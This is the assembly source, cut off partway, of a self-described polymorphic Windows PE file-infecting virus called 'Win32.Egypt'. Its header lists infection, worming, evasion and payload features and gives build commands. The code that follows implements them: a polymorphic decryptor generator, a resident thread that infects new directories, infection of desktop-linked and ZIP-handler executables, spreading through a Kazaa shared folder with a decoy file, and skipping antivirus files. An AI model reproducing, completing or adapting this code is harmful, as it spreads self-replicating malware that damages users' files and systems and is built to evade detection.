;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; ; ; ; ; ; ; (Ermm...I'd higly appreciate if someone would take the pain ; of drawing a sphynx or a couple of pyramids here, because, ; as you can see, not only my asm skills suck...) ; ; ; ; ; ; ; Win32.Egypt ; ; ~~~~~~~~~~~ ; ; @2005 TOE-VX ; ~~~~~~~~~~~~ ; ; ; ; ; ; ;============================================================================= ; DISCLAIMER : ; ~~~~~~~~~~ This is the source of a VIRUS, The author is not ; responsible for any damage that may occur due to ; the assembly of this file. Use it at your own risk. ; ;============================================================================= ; ; ; ; * Targets : PE EXE Files. ; ; * Residence : Per Process Resident. ; ; * Hooked APIs : None. ; ; * Infection method : Every 8 seconds it will scan for directory change ; and infects all files in new directory ; this is a very efficient method to retrieve files. ; The virus will also search for all exe files pointed ; to by link files in the desktop and infect them. ; Also the virus will infect all applications used ; to open ZIP files. EXE files are infected by the ; classical method of adding the viral body to the ; section in the file. ; ; * EPO : None. ; ; * Polymorphism : Yes, The virus is polymorphic using its own engine. ; The virus uses slow polymorphism, utilizing a single ; decryptor for all files infected in the current run ; of the infected process. The polymorphic engine utilizes ; random registers, constructs calls to subroutines and ; also features conditional and unconditional jumps with ; non zero displacements. Yet it only utilizes a 32 bit ; xor operation. Although i coded this engine from scratch, ; i would like to thank GriYo, since i started writing ; "real" polymorphic engines only after i examined his ; 1996 Dos virus Implant. ; ; * Encryption : Yes, the virus is encrypted twice , the first decryptor ; is that generated by the polymorphic engine and the other ; decryptor is a fixed one with anti emulation trick. ; The encryption algorithm is just meant to be effective ; against scanners, not a one you would say much about. ; ; * Worming : Yes, the virus will infect all executables at the kazza ; shared folder, thus being able to pass to other PCs and ; thus exhibiting P2P worming, It will also create an ; executable file there and infect it, the executable ; file has a really attractive name ;) and a facked ; message in case the user runs it. ; ; * Misc : Reserves file attributes and time, Marks infected files ; Uses SEH to stabilize infected files ; Avoids infecting AVs as it will not infect files ; having AV,AN,DR,ID,OD,TB,F- in their names ; Avoids Infecting system files and avoids infecting ; DLLs misnamed as EXEs also doesn't infect compressed files ; Those extra checks give the virus very good performance ; and reduce error and corruption chances. ; ; * Payload : 1. On egyptian PCs it will display a funny message ; the message is randomly chosen from twenty messages ; the message will appear whenever an infected file ; is executed with a one over twenty five probability. ; I have included the english translations in the source ; in case somebody is interested. ; ; 2. On non-egyptian PCs it will change IE default homepage ; to the egyptain ministry of tourism webpage ; http://www.Touregypt.net, This will take place on the ; first and third friday of every month. ; ; ;============================================================================= ; ; Version History: ;================= ; ; 25-7-2005 version 1.0 finished ; ; 26-7-2005 Kaspersky detects version 1.0 , that's a really good job guys ; keep it up ;) and as usual they misname the virus as "Gypet" which rather ; sounds like a porn film title !! *^_^* ; ; 27-7-2005 version 1.2 that is a version 1.0 with slight code changes and ; comments ; ; 29-7-2005 I upgraded the virus to version 1.5 by adding a polymorphic ; engine. ; ;============================================================================= ; ; Things to be done in ver 2.0: ;============================== ; ; 1- New anti emulation tricks ; 2- ZIP infection ; 3- More worming strategies ; 4- SFC file protection awareness ; 5- EPO ; 6- Terminate AVers processes ; ;============================================================================= ; ; Greetings : ; ~~~~~~~~~~~ ; Although almost everyone i will be greeting here has already quit writing ; viruses since a very long time now, i would still like to express my ; gratitude to them all. ; ; Nowhere Man : Everybody knows that VCL produced only lame viruses, yet its ; commented sources were excellent to teach me assembly in a stupid country ; lacking any books dedicated to assembly. ; ; Dark Angel : For presenting me to "real" Dos viruses. ; ; Neurobasher and vyvojar : For writing some of the best Dos viruses ever. ; ; 29A : For editing a really good virus magazine. ; ; Lord Julus : For being very friendly with me in our few email exchanges ; and for writing very friendly and useful articles. ( I like Rammstein too ;) ; ; The Mental Driller : For being THE most ethical virus writter ever as well ; as for writing some of the most complicated viruses ever. ; ; Zombie : For writing Mistfall. ; ; And greetings for all the other virus writers who exhibit ethical and ; friendly attitude and for those who write advanced and complicated research ; viruses. ; ;============================================================================= ; ; * To Assemble : ; ~~~~~~~~~~~~~~~ ; tasm32 -ml -m5 -q -zn egypt.asm ; tlink32 -Tpe -c -x -aa egypt,,, import32 ; pewrsec egypt.exe ; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; .386p .model flat JUMPS cmp_ macro reg,joff1 inc reg jz joff1 dec reg endm apicall macro apioff call dword ptr [ebp+apioff] endm .data mark equ 04Ch section_flags equ 00000020h or 20000000h or 80000000h code_len equ code_end - code_start L equ <LARGE> GENERIC_READ equ 80000000h GENERIC_WRITE equ 40000000h GENERIC_READ_WRITE equ GENERIC_READ or GENERIC_WRITE OPEN_EXISTING equ 00000003h PAGE_READWRITE equ 00000004h PAGE_WRITECOPY equ 00000008h FILE_MAP_WRITE equ 00000002h FILE_SHARE_READ equ 00000001h FILE_ATTRIBUTE_NORMAL equ 00000080h FILE_ATTRIBUTE_DIRECTORY equ 00000010h FILE_BEGIN equ 00000000h HKEY_CURRENT_USER equ 80000001h KEY_SET_VALUE equ 00000002h REG_SZ equ 00000001h SPI_SETDESKWALLPAPER equ 00000020 CREATE_ALWAYS equ 00000002h MB_ICONEXCLAMATION equ 00000030h ; Only hardcoded for 1st generation kernel_ equ 0BFF70000h kernel_wNT equ 077F00000h shit_size equ delta-code_start FILETIME struc dwLowDateTime dd ? dwHighDateTime dd ? FILETIME ends WIN32_FIND_DATA struc dwFileAttributes dd ? ftCreationTime FILETIME ? ftLastAccessTime FILETIME ? ftLastWriteTime FILETIME ? nFileSizeHigh dd ? nFileSizeLow dd ? dwReserved0 dd ? dwReserved1 dd ? cFileName db 260 dup (?) cAlternateFileName db 14 dup (?) WIN32_FIND_DATA ends SYSTEMTIME struc wYear dw ? wMonth dw ? wDayOfWeek dw ? wDay dw ? wHour dw ? wMinute dw ? wSecond dw ? wMilliseconds dw ? SYSTEMTIME ends ; Functions imported by Generation-1 - extrn ExitProcess:PROC extrn GetModuleHandleA:PROC extrn MessageBoxA:PROC ; Some dummy data for Generation-1 - .data dummy dd 0 ;---------------------------------------------------------------------------- ; CODE - ;---------------------------------------------------------------------------- .code code_start: call poly_dec poly_enc: popfd popad pushad pushfd call decrypt enc: call delta_ delta: db "Win32.Egypt v 1.5",0 db "(c) 2005 TOE-VX. Dedicated to my friends RNT and TRT.",0 db "A Big F#@! you to all the terrorists who commited" db " the sharm massacre." delta_: pop ebp mov eax,ebp sub ebp,offset delta sub eax,shit_size sub eax,00001000h NewEIP equ $-4 mov dword ptr [ebp+module_base],eax ; Constructing SEH will allow the virus to run smoothly and stabilize ; infected files against crashes. call ChangeSEH mov esp,[esp+08h] jmp RestoreSEH ChangeSEH: xor ebx,ebx push dword ptr fs:[ebx] mov fs:[ebx],esp ; Now we will get kernel 32 address mov esi,[esp+2Ch] and esi,0FFFF0000h mov ecx,5 call GetK32 mov dword ptr [ebp+kernel],eax ; Now get the APIs lea esi,[ebp+@@NamezCRC32] lea edi,[ebp+@@Offsetz] call GetAPIs ; Initialize random number generator call irandom32 ; Generate a polymorphic decryptor call Poly jc RestoreSEH ; Infect all applications used to deal with ZIP files and infect the ; Kazza shared folder, if any. mov eax,[ori_eip+ebp] mov [tmp_eip+ebp],eax call infectzippers mov eax,[tmp_eip+ebp] mov [ori_eip+ebp],eax ; Infect all the files pointed to by links on the desktop mov eax,[ori_eip+ebp] mov [tmp_eip+ebp],eax call infectlinks mov eax,[tmp_eip+ebp] mov [ori_eip+ebp],eax ; Launch a thread that will detect directory changes and infect files ; in new directories call LaunchVirusMainThread ; Get the Message box API address, if we fail we will skip the payload mov eax,offset u32_string add eax,ebp call VxGetModuleHandle or eax,eax je RestoreSEH mov [user32+ebp],eax mov edx,offset msgbox_string add edx,ebp mov eax,[user32+ebp] call VxGetProcAddress or eax,eax je RestoreSEH mov [_MessageBoxA+ebp],eax ; Check if we should make a payload or not and do it if necessary call payload ;N.B. payload must be after zip infection ;as adavapi dll must be loaded ; Restore SEH and jump back to host RestoreSEH: xor ebx,ebx pop dword ptr fs:[ebx] pop eax popfd popad mov ebx,12345678h org $-4 ori_eip dd offset g1_quit - 400000h add ebx,12345678h org $-4 module_base dd 00400000h push ebx ret ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; P O L Y E N G I N E ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Poly: push 00000040h push 00001000h OR 00002000h push 00001000h push 0h call dword ptr [_VirtualAlloc+ebp] or eax,eax jne contpoly stc ret decplace dd 0h dec_len dd 0h viruslen dd 0h keyy db 00h, 00h, 00h, 00h contpoly: mov dword ptr [ebp+decplace],eax push eax pop edi ; now edi points to place to put decryptor ; we want to generate a decryptor that looks like this : ; pop reg1 ; push reg1 ; xor reg2,reg2 ; mov reg3,key ;dec_loop: ; xor dword ptr [reg1],reg3 ; add reg1,4h ; inc reg2 ; cmp reg2,((decrypt-enc)/4)+1 ; jne dec_loop ; ret no_reg1_ebp: call getfreg ;gen pop reg1 cmp al,5 je no_reg1_ebp mov byte ptr [ebp+regs],al mov al,byte ptr[pops+eax+ebp] stosb mov ax,09c60h ;gen pushad&pushfd stosw mov dword ptr [ebp+regs+1],0 call garble xor eax,eax mov al,byte ptr[ebp+regs] mov al,byte ptr[pushs+eax+ebp] stosb call garble xor eax,eax ;gen xor/sub reg2,reg2 mov al,06h call rndeax cmp al,3h jbe @xor mov al,02bh jmp @skipxor @xor: mov al,033h @skipxor: stosb xor eax,eax call getfreg mov byte ptr [ebp+regs+1],al mov bl,al push ecx mov cl,3 shl al,cl pop ecx add al,0c0h add al,bl stosb call garble call getfreg ;gen mov reg3,key mov byte ptr [ebp+regs+2],al add al,0b8h stosb call random32 mov word ptr[ebp+keyy],ax stosw call random32 mov word ptr[ebp+keyy+2],ax stosw call garble mov dword ptr[ebp+loopplace],edi ; we will be loping ; here call garble mov al,31h ; gen xor[reg],reg stosb xor eax,eax mov al,byte ptr [ebp+regs+2] push ecx mov cl,3 shl al,cl pop ecx mov ebx,eax xor eax,eax mov al,byte ptr [ebp+regs] add eax,ebx stosb call garble mov al,083h ;gen add reg1,4 stosb xor eax,eax mov al,byte ptr [ebp+regs] add ax,04c0h stosw call garble xor eax,eax mov al,byte ptr [ebp+regs+1] add al,40h stosb call garble xor eax,eax mov al,byte ptr [ebp+regs+1] cmp al,0 jne @nf_eax mov al,3dh stosb jmp @conttt @nf_eax: xchg al,ah mov al,81h stosb xchg al,ah add al, 0f8h stosb @conttt: mov eax,((poly_end-poly_enc)/4)+1 stosw xor eax,eax stosw mov ax,0574h stosw mov al,0e9h stosb mov eax,dword ptr[ebp+loopplace] sub eax,edi sub eax,4h ; ?? mov dword ptr[edi],eax inc edi inc edi inc edi inc edi call garble mov al,0c3h ;return stosb call garble mov ecx,edi sub ecx, dword ptr [ebp+decplace] mov dword ptr [ebp+dec_len],ecx mov dword ptr [ebp+viruslen],code_len add dword ptr [ebp+viruslen],ecx clc ret pushs: push eax push ecx push edx push ebx push esp ;won't be used , naturally push ebp push esi push edi end_pushs: pops: pop eax pop ecx pop edx pop ebx pop esp pop ebp pop esi pop edi end_pops: garble: mov eax,((offset choices_end-choices)/4) call rndeax shl eax,2 add eax,ebp add eax,offset choices mov eax,[eax] add eax,ebp call eax ret choices: dd offset garblock dd offset pushpop dd offset abs_jmp dd offset backcall dd offset cond_jmp dd offset cond_shit choices_end: jmplocation dd 0h calllocation dd 0h cond_jmp: xor eax,eax mov al,10h call rndeax add al,070h stosb stosb mov dword ptr [ebp+jmplocation],edi call garblock mov eax,dword ptr [ebp+jmplocation] sub eax,edi push edi mov edi,dword ptr [ebp+jmplocation] dec edi neg al stosb pop edi ret backcall: mov al,0ebh stosb stosb mov dword ptr [ebp+jmplocation],edi call abs_shit mov dword ptr [ebp+calllocation],edi call garblock mov al,0c3h stosb call abs_shit mov eax,dword ptr [ebp+jmplocation] sub eax,edi push edi mov edi,dword ptr [ebp+jmplocation] dec edi neg al stosb pop edi mov al,0e8h stosb mov eax,(0ffffh -3h) sub eax,edi add eax,dword ptr [ebp+calllocation] stosw mov ax,0ffffh stosw ret cond_shit: xor eax,eax mov al,80h call rndeax cmp al,40h je stc_ mov ax,073f8h stosw call abs_shit ret stc_: mov ax,072f9h stosw call abs_shit ret abs_jmp: mov al,0ebh stosb call abs_shit ret abs_shit: mov eax,20h call rndeax stosb mov ecx,eax shitloop: push ecx call random32 pop ecx stosb loop shitloop ret pushpop: call getreg add eax,ebp add eax,offset pushs mov al,byte ptr [eax] stosb call garblock call getfreg add eax,ebp add eax,offset pops mov al,byte ptr [eax] stosb ret garblock: xor eax,eax mov al,7h call rndeax add al,3 mov ecx,eax loph: push ecx call garbage pop ecx loop loph ret garbage: xor eax,eax mov al,100 call rndeax cmp al,30 ;30% reg imm jbe regimm cmp al,40 ;10% rem mem jbe regmem cmp al,50 ;10% one byte jbe onebyte jmp regreg ;50% reg reg onebyte: mov eax,offset one_end-one call rndeax mov ebx,eax add ebx,ebp add ebx,offset one mov al,byte ptr [ebx] stosb ret regmem: mov eax,offset (etwobitinstrs- twobitinstrs) call rndeax mov ecx,offset twobitinstrs add ecx,eax mov al,byte ptr [ecx+ebp] or al,al je regmem stosb call getfreg mov ecx,3 shl al,cl mov ebx,eax mov al,08h mov al,byte ptr [ebp+regs] add eax,ebx stosb ret regimm: ;generate op reg,imm (eax not included) mov al,81h stosb mov al,8 call rndeax push ecx ;we now need to make *8 xor ecx,ecx mov cl,3 shl al,cl pop ecx add al,0c1h mov ebx,eax call getfreg dec eax ;coz eax has no opcode add eax,ebx stosb call random32 stosw call random32 stosw ret regreg: ;generate op reg,reg mov eax, offset (etwobitinstrs- twobitinstrs) call rndeax xor ebx,ebx mov bl,al add ebx,offset twobitinstrs add ebx,ebp mov al,byte ptr [ebx] or al,al je regreg stosb call getfreg push ecx mov cl,3 shl al,cl pop ecx mov ebx,eax add bl,0c0h call getfreg add bl,al xchg eax,ebx stosb ret getfreg: ;get free reg xor eax,eax f_esp: mov al,8 call rndeax cmp al,4 je f_esp cmp byte ptr[ebp+regs],al je f_esp cmp byte ptr[ebp+regs+1],al je f_esp cmp byte ptr[ebp+regs+2],al je f_esp ret getreg: xor eax,eax mov al,8 call rndeax ret loopplace dd 0h fromhere dd 0h regs: db 0 db 0 db 0 twobitinstrs: db 23h ;and db 3bh ;cmp db 0bh ;or db 8bh ;mov db 33h ;xor db 03h ;add db 2bh ;sub etwobitinstrs: one: NOP CLC STC one_end: ; POLY ENGINE ENDS HERE ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; Infect all files pointed to by links on the desktop ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; infectlinks: mov edi,ebp add edi,offset olddir mov al,0 mov ecx,128 rep stosb push ebp push L 128 mov eax,ebp add eax,offset olddir push eax call [_GetWindowsDirectoryA+ebp] pop ebp mov edi,ebp add edi,offset olddir add edi,eax mov esi,ebp add esi,offset desktop mov ecx,9 rep movsb push ebp mov eax,ebp add eax,offset currdir push eax push L 128 call [_GetCurrentDirectoryA+ebp] pop ebp mov edx,ebp add edx,offset olddir push edx call [ebp+_SetCurrentDirectoryA] call searchlinks mov edx,ebp add edx,offset currdir push edx call [ebp+_SetCurrentDirectoryA] ret searchlinks: push ebp mov eax,offset wfd add eax,ebp push eax mov eax,offset lnk_match add eax,ebp push eax call [_FindFirstFileA+ebp] pop ebp inc eax or eax,eax je icd_end2 dec eax mov [search_handle2+ebp],eax mov edx,offset wfd.cFileName add edx,ebp call infectlink fnf_loop2: mov edx,ebp add edx,offset olddir push edx call [ebp+_SetCurrentDirectoryA] push ebp mov eax,offset wfd add eax,ebp push eax push [search_handle2+ebp] call [_FindNextFileA+ebp] pop ebp cmp eax,0 je icd_end2 mov edx,offset wfd.cFileName add edx,ebp call infectlink jmp fnf_loop2 icd_end2: push [search_handle2+ebp] call [ebp+_FindClose] ret infectlink: push 0 push 0 push OPEN_EXISTING push 0 push 0 push GENERIC_READ+GENERIC_WRITE push edx call [ebp+_CreateFileA] mov [ebp+hfile2], eax push 0 push eax call [ebp+_GetFileSize] push eax push 0 push eax push 0 push PAGE_READWRITE push 0 push [ebp+hfile2] call [ebp+_CreateFileMappingA] mov [ebp+hmap2], eax pop eax push eax push eax push 0 push 0 push 2 ;FILE_MAP_ALL_ACCESS push [ebp+hmap2] call [ebp+_MapViewOfFile] mov [ebp+haddress2], eax pop ebx ; length push eax pop edx add ebx,edx scashit: inc edx cmp edx,ebx jae invalidlnk cmp word ptr [edx], "\:" jne scashit scashit2: inc edx cmp edx,ebx jae invalidlnk cmp word ptr [edx], "\:" jne scashit2 dec edx call InfectFile invalidlnk: push [ebp+haddress2] call [ebp+_UnmapViewOfFile] push [ebp+hmap2] call [ebp+_CloseHandle] push [ebp+hfile2] call [ebp+_CloseHandle] ret ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; Infect all Applications that are used to open ZIPs ; and drop the file on kazaa's shared folder, if any ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; infectzippers: pushad mov eax,offset a32_string add eax,ebp call VxGetModuleHandle or eax,eax je @@@End mov [advapi32+ebp],eax mov edx,offset regopen_string add edx,ebp mov eax,[advapi32+ebp] call VxGetProcAddress or eax,eax je @@@End mov [_RegOpenKeyExA+ebp],eax mov edx,offset regget_string add edx,ebp mov eax,[advapi32+ebp] call VxGetProcAddress or eax,eax je @@@End mov [_RegQueryValueExA+ebp],eax mov edx,offset Regset add edx,ebp mov eax,[advapi32+ebp] call VxGetProcAddress or eax,eax je @@@End mov [_RegSetValueExA+ebp],eax mov edx,offset close_string add edx,ebp mov eax,[advapi32+ebp] call VxGetProcAddress or eax,eax je @@@End mov [_RegCloseKey+ebp],eax player_loop: mov eax,offset HandleOpenedKey add eax,ebp push eax push 000F003Fh ;KEY_ALL_ACCESS push 0 call pushstring db "Software\Microsoft\Windows\CurrentVersion\Explorer\" db "FileExts\.zip\OpenWithList",0 pushstring: push 80000001h ;HKEY_CURRENT_USER call [ebp+ _RegOpenKeyExA] or eax, eax jnz @@End call clean_buff mov eax,offset buff_ add eax,ebp push eax mov eax, offset buff add eax,ebp push eax push 0 push 0 call pushvalue player db "a",0 pushvalue: push dword ptr [ebp+HandleOpenedKey] call [ebp+_RegQueryValueExA] push dword ptr [ebp+ HandleOpenedKey] call [ebp+_RegCloseKey] ; Close key handle mov esi,offset buff mov edi,offset prog_buffer add esi,ebp add edi,ebp next_copy: lodsb cmp al,0 je copy_done stosb jmp next_copy copy_done: mov esi,offset part2 add esi,ebp mov ecx,part2_len rep movsb mov eax, offset HandleOpenedKey add eax,ebp push eax push 000F003Fh ;KEY_ALL_ACCESS push 0 mov eax, offset prog_itself add eax,ebp push eax push 80000000h ;HKEY_CLASSES_ROOT call [ebp+_RegOpenKeyExA] or eax, eax jnz @@End call clean_buff mov eax, offset buff_ add eax,ebp push eax mov eax, offset buff add eax,ebp push eax push 0 push 0 push 0 ;Default value push dword ptr [ebp+HandleOpenedKey] call [ebp+_RegQueryValueExA] push dword ptr [ebp+HandleOpenedKey] call [ebp+ _RegCloseKey] mov esi,ebp add esi,offset buff push esi loopsearch: cmp dword ptr [esi],"exe." je reached cmp dword ptr [esi],"EXE." je reached inc esi jmp loopsearch reached: add esi,4 push esi pop edi mov al,0 stosb pop esi first_loop: mov ax,word ptr [esi+1] cmp ax, "\:" je skip_dec inc esi jmp first_loop skip_dec: mov edx,esi call InfectFile inc byte ptr [ebp+player] jmp player_loop @@End: mov byte ptr [ebp+player],"a" mov eax,offset HandleOpenedKey add eax,ebp push eax push 000F003Fh ;KEY_ALL_ACCESS push 0 call pushstring2 db "SOFTWARE\KAZAA\LocalContent",0 pushstring2: push 80000002h ;HKEY_CURRENT_USER call [ebp+ _RegOpenKeyExA] or eax, eax jnz @@@End call clean_buff mov eax,offset buff_ add eax,ebp push eax mov eax, offset buff add eax,ebp push eax push 0 push 0 call pushvalue2 db "DownloadDir",0 pushvalue2: push dword ptr [ebp+HandleOpenedKey] call [ebp+_RegQueryValueExA] push dword ptr [ebp+ HandleOpenedKey] call [ebp+_RegCloseKey] push ebp mov eax,ebp add eax,offset currdir push eax push L 128 call [_GetCurrentDirectoryA+ebp] pop ebp mov edx,ebp add edx,offset buff push edx call [ebp+_SetCurrentDirectoryA] call InfectCurrentDirectory call dropfile mov edx,ebp add edx,offset currdir push edx call [ebp+_SetCurrentDirectoryA] @@@End: popad ret clean_buff: pushad mov edi,offset buff_ add edi,ebp mov dword ptr [edi],030h add edi,4 mov ecx,30h mov al,0 rep stosb popad ret ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; Drop a file in kazza's shared folder ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; dropfile: mov edx,ebp add edx,offset fileee push edx call [ebp+_GetFileAttributesA] inc eax or eax,eax je makeit ret makeit: push 0 push 0 push 1 ; Create new push 0 push 0 push GENERIC_READ+GENERIC_WRITE mov edx,ebp add edx,offset fileee push edx call [ebp+_CreateFileA] mov [ebp+hfile],eax push 0 mov eax,4096 ;note that the filesize is hardcoded push eax push 0 push PAGE_READWRITE push 0 push [ebp+hfile] call [ebp+_CreateFileMappingA] mov [ebp+hmap], eax mov eax,4096 push eax push 0 push 0 push 2 ;FILE_MAP_ALL_ACCESS push [ebp+hmap] call [ebp+_MapViewOfFile] mov [ebp+haddress], eax mov edi,eax mov esi,ebp add esi, offset dropstart mov ecx,dropend-dropstart nextat: ; Decompress compressed dropper lodsb ; file, i would like to thank or al,al ; Vecna for simple decompressor jnz nextbit dec ecx dec ecx push ecx lodsw xor ecx,ecx mov cx,ax mov al,0 rep stosb pop ecx loop nextat jcxz quitta nextbit: stosb loop nextat quitta: push [ebp+haddress] call [ebp+_UnmapViewOfFile] push [ebp+hmap] call [ebp+_CloseHandle] push [ebp+hfile] call [ebp+_CloseHandle] ret ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; Get Kernel32 address, thanks billy ! ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; GetK32: _@1: jecxz WeFailed mov cx,word ptr [esi] xor cx,"4k" cmp cx,"ZM"xor "4k" jz CheckPE _@2: sub esi,10000h dec ecx jmp _@1 CheckPE: mov edi,[esi+3Ch] add edi,esi mov cx,word ptr [edi] xor cx,"3a" cmp cx,"EP"xor "3a" jz WeGotK32 jmp _@2 WeFailed: mov ecx,cs xor cl,cl jecxz WeAreInWNT mov esi,kernel_ jmp WeGotK32 WeAreInWNT: mov esi,kernel_wNT WeGotK32: xchg eax,esi ret ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; Get APIs , also thanks billy ! ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; GetAPIs: @@1: lodsd push esi push edi call GetAPI_ET_CRC32 pop edi pop esi stosd cmp byte ptr [esi],0BBh ; Last API? jz @@4 jmp @@1 @@4: ret GetAPI_ET_CRC32: xor edx,edx xchg eax,edx mov word ptr [ebp+Counter],ax mov esi,3Ch add esi,[ebp+kernel] lodsw add eax,[ebp+kernel] mov esi,[eax+78h] add esi,1Ch add esi,[ebp+kernel] lea edi,[ebp+AddressTableVA] lodsd add eax,[ebp+kernel] stosd lodsd add eax,[ebp+kernel] push eax stosd lodsd add eax,[ebp+kernel] stosd pop esi @?_3: push esi lodsd add eax,[ebp+kernel] xchg edi,eax mov ebx,edi push edi xor al,al scasb jnz $-1 pop esi sub edi,ebx push edx call CRC32 pop edx cmp edx,eax jz @?_4 pop esi add esi,4 inc word ptr [ebp+Counter] jmp @?_3 @?_4: pop esi movzx eax,word ptr [ebp+Counter] shl eax,1 add eax,dword ptr [ebp+OrdinalTableVA] xor esi,esi xchg eax,esi lodsw shl eax,2 add eax,dword ptr [ebp+AddressTableVA] xchg esi,eax lodsd add eax,[ebp+kernel] ret CRC32: cld xor ecx,ecx dec ecx mov edx,ecx NextByteCRC: xor eax,eax xor ebx,ebx lodsb xor al,cl mov cl,ch mov ch,dl mov dl,dh mov dh,8 NextBitCRC: shr bx,1 rcr ax,1 jnc NoCRC xor ax,08320h xor bx,0EDB8h NoCRC: dec dh jnz NextBitCRC xor ecx,eax xor edx,ebx dec edi jnz NextByteCRC not edx not ecx mov eax,edx rol eax,16 mov ax,cx ret ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; This is the virus resident part, it will detect directory ; change every 8 seconds and infect all files in the new one ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; VThread: call get_delta get_delta: pop ebp sub ebp,offset get_delta @loophere: mov eax,[ori_eip+ebp] mov [tmp_eip+ebp],eax call InfectCurrentDirectory mov eax,[tmp_eip+ebp] mov [ori_eip+ebp],eax @sleepagain: push 8000 call [ebp+_Sleep] push ebp mov eax,ebp add eax,offset currdir push eax push L 128 call [_GetCurrentDirectoryA+ebp] pop ebp mov esi,ebp mov edi,esi add esi,offset currdir add edi,offset olddir xor ecx,ecx mov cl,128 rep cmpsb je @sleepagain mov esi,ebp mov edi,esi add esi,offset currdir add edi,offset olddir xor ecx,ecx mov cl,128 rep movsb jmp @loophere ret ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; This will launch the virus resident part ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; LaunchVirusMainThread: pushad lea ebx,[ebp+offset ThreadID3] push ebx push 4h push 0h lea ebx,[ebp+offset VThread] push ebx push 0h push 0h call [ebp+_CreateThread] or eax,eax je @noway push eax push -1h ;low priority push eax call [ebp+_SetThreadPriority] call [ebp+_ResumeThread] @noway: popad ret ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; Infect all EXE files in current directory ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; InfectCurrentDirectory: push ebp mov eax,offset wfd add eax,ebp push eax mov eax,offset exe_match add eax,ebp xor [eax],"Shit" push eax call [_FindFirstFileA+ebp] pop ebp push eax mov eax,offset exe_match add eax,ebp xor [eax],"Shit" pop eax inc eax or eax,eax je icd_end dec eax mov [search_handle+ebp],eax mov edx,offset wfd.cFileName add edx,ebp call InfectFile fnf_loop: push ebp mov eax,offset wfd add eax,ebp push eax push [search_handle+ebp] call [_FindNextFileA+ebp] pop ebp or eax,eax je icd_end mov edx,offset wfd.cFileName add edx,ebp call InfectFile jmp fnf_loop icd_end: push [search_handle+ebp] call [ebp+_FindClose] ret ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; Infects EXE file pointed to by EDX ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; InfectFile: push edx ; Don't infect AVs , thanks pop esi ; bumblebee ;) lea edi,avStrings+ebp mov ecx,vStringsCout testIfAvL: push esi mov ax,word ptr [edi] testAvLoop: cmp word ptr [esi],ax jne contTestLoop pop esi ret contTestLoop: inc esi cmp byte ptr [esi+3],0 jne testAvLoop pop esi add edi,2 loop testIfAvL push edx push ebp mov eax,offset wfd add eax,ebp push eax push edx call [_FindFirstFileA+ebp] pop ebp push eax call [ebp+_FindClose] mov edx, [ebp+wfd.dwFileAttributes] test edx, 800h ; Avoid compressed je conttt ; files pop edx ret conttt: test edx,4h je contttt pop edx ret contttt: pop edx mov esi,edx mov edi,ebp add edi,offset wfd.cFileName @morecopy: lodsb stosb cmp al,0 jne @morecopy lea esi,[ebp+wfd.cFileName] push 80h push edx apicall _SetFileAttributesA call OpenFile cmp_ eax,CantOpen mov dword ptr [ebp+FileHandle],eax mov ecx,dword ptr [ebp+wfd.nFileSizeLow] call CreateMap cmp_ eax,CloseFile mov dword ptr [ebp+MapHandle],eax mov ecx,dword ptr [ebp+wfd.nFileSizeLow] call MapFile cmp_ eax,UnMapFile mov dword ptr [ebp+MapAddress],eax mov esi,eax mov esi,[esi+3Ch] add esi,eax mov ecx,dword ptr [esi]; xor cx,"7f" cmp cx,"EP"xor"7f" jnz NoInfect test word ptr [esi+16h],2000h ; Don't infect dlls jnz NoInfect cmp dword ptr [esi+mark],012345678h ; Was it infected? jz NoInfect push dword ptr [esi+3Ch] push dword ptr [ebp+MapAddress] apicall _UnmapViewOfFile push dword ptr [ebp+MapHandle] apicall _CloseHandle pop ecx mov eax,dword ptr [ebp+wfd.nFileSizeLow] add eax,[ebp+viruslen] call Align xchg ecx,eax call CreateMap cmp_ eax,CloseFile mov dword ptr [ebp+MapHandle],eax mov ecx,dword ptr [ebp+NewSize] call MapFile cmp_ eax,UnMapFile mov dword ptr [ebp+MapAddress],eax ; I would like to thank billy for the PE infection algorithm mov esi,eax mov esi,[esi+3Ch] add esi,eax mov edi,esi movzx eax,word ptr [edi+06h] dec eax imul eax,eax,28h add esi,eax add esi,78h mov edx,[edi+74h] shl edx,3 add esi,edx mov eax,[edi+28h] mov dword ptr [ebp+ori_eip],eax mov edx,[esi+10h] mov ebx,edx add edx,[esi+14h] push edx mov eax,ebx add eax,[esi+0Ch] mov [edi+28h],eax mov dword ptr [ebp+NewEIP],eax mov eax,[esi+10h] add eax,[ebp+viruslen] mov ecx,[edi+3Ch] call Align mov [esi+10h],eax mov [esi+08h],eax pop edx mov 